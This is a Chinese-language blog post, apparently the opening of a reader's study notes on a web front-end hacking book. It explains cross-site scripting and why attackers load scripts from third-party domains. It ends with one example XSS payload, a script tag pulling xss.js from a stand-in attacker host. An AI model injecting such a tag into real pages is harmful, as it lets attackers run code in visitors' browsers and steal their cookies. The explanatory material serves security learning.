学习和研究Web安全这么久都没有好好地写过心得,SQLi、XSS、CSRF等常见的Web漏洞都看了个遍,回头看来还是什么都不知道(ps:学习和研究的时候做笔记相当重要啊~ ~)。闲暇之余,又拾起余弦大牛的技术精华《Web前端黑客技术揭秘》一书,本人没有做笔记写博客的习惯,但这一次,我要好好地记录一下下,就当练习自己的写作能力了~
0x00 XSS介绍
XSS(Cross Site Scripting)即跨站脚本,攻击者将恶意代码嵌入html页面里面,当用户浏览该页面的时候就会执行攻击者的恶意代码,导致用户cookie泄漏,用户客户端被攻击等。
就像书里面讲的一样,跨站脚本的重点并不在 “跨站” 上,而应该在 “脚本” 上。”跨站“ 实际上就是XSS攻击嵌入了一段远程的或者第三方域上的脚本资源,任何安全问题都有 “Input” 的概念,一般有安全意识的网站,输入的内容长度都是有长度限制的,这就给恶意代码直接嵌入页面造成了困难,但是常常会有下面这种攻击情况,引用第三方域上的脚本资源:
<script src="http://www.assailant.com/xss.js"></script>